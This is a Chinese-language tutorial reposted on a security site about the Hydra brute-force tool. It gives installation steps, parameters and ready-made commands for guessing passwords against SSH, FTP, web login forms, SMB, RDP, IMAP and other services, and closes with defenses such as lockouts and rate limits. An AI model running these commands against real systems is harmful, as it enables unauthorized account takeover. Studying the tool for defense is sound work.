黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

九头蛇(hydra)破解密码的神器

2018-8-9 01:05| 投稿: xiaotiger |来自: 互联网

摘要: 简介Hydra,中文名:九头蛇。是著名的黑客组织THC开发的一款开源暴力破解工具,开发主要目的是:安全研究人员可以从远程获取一个系统认证权限。安装这里主要是linux下的安装,当然也有windows的图形化界面版本。wget ...

免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。

简介

Hydra,中文名:九头蛇。是著名的黑客组织THC开发的一款开源暴力破解工具,开发主要目的是:安全研究人员可以从远程获取一个系统认证权限。

安装

这里主要是linux下的安装,当然也有windows的图形化界面版本。

  1. wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz
  2. tar zxvf hydra-8.1.tar.gz
  3. cd hydra-8.1
  4. ./configure
  5. make && make install

参数

  • -R------根据上一次进度继续破解
  • -S------使用SSL协议连接
  • -s PORT------指定端口
  • -l LOGIN------指定用户名
  • -L FILE------指定用户名字典(文件)
  • -p PASS------指定密码破解
  • -P FILE------指定密码字典(文件)
  • -e ns------空密码探测和指定用户密码探测(ns)
  • -M FILE------指定目标列表文件一行一条
  • -f ------在使用-M参数后,找到第一对登录名或者密码的时候中止破解
  • -w TIME------设置最大超时的时间,单位秒,默认30s
  • -C FILE------ 用户名可以用:分割(username:password)可以代替-l username -p password
  • -o FILE------输出文件
  • -t TASKS------指定多线程数量,默认为16个线程
  • -v / -V ------显示详细过程
  • server------目标IP
  • service------指定服务名

类型

hydra用针对协议的暴力破解和针对web表单登录的暴力破解。

协议暴力破解

  • 单用户单目标hydra -l root -P 密码文件 目标主机IP 协议
  • 多用户单目标hydra -L 用户名文件 -P 密码文件 目标主机IP 协议
  • 多用户多目标hydra -L 用户名文件 -P 密码文件 目标IP列表 协议

WEB暴力破解

你需要知道的信息有:

  • 你要破解的主机名或者IP和URL
  • 区分是https和http
  • 表单支持的提交方法(POST or GET)
  • 请求的参数名
  • 登录成功和失败时返回信息的区别

举例

1、破解ssh:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

ssh破解成功

上面的登录名:root,密码:584520

2、破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

hydra -t 3 -l admin -P pass.txt -o out.txt -f ip http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。)

5、破解https:

hydra -m /index.php -l muts -P pass.txt ip https

6、破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt ip cisco

hydra -m cloud -P pass.txt ip cisco-enable

8、破解smb:

hydra -l administrator -P pass.txt ip smb

9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://ip

12、破解imap:

hydra -L user.txt -p secret ip imap PLAIN

hydra -C defaults.txt -6 imap://[acm]:143/PLAIN

反思

现在见识到这一款工具的威力了,应该好好反思我们密码的安全问题。

  • 增加密码的长度与复杂度
  • 在系统中限制密码试错的次数
  • 密码验证时,将验证结果不是立即返回而是延时若干秒后返回。
  • 限制允许发起请求的客户端的范围
  • 禁止密码输入频率过高的请求
  • 将密码设置为类似安全令牌那样每隔一定时间就发生变化的形式
  • 当同一来源的密码输入出错次数超过一定阈值,立即通过邮件或短信等方式通知系统管理员
  • 人为监视系统,确认有无异常的密码试错

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6587313986872541700/

免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部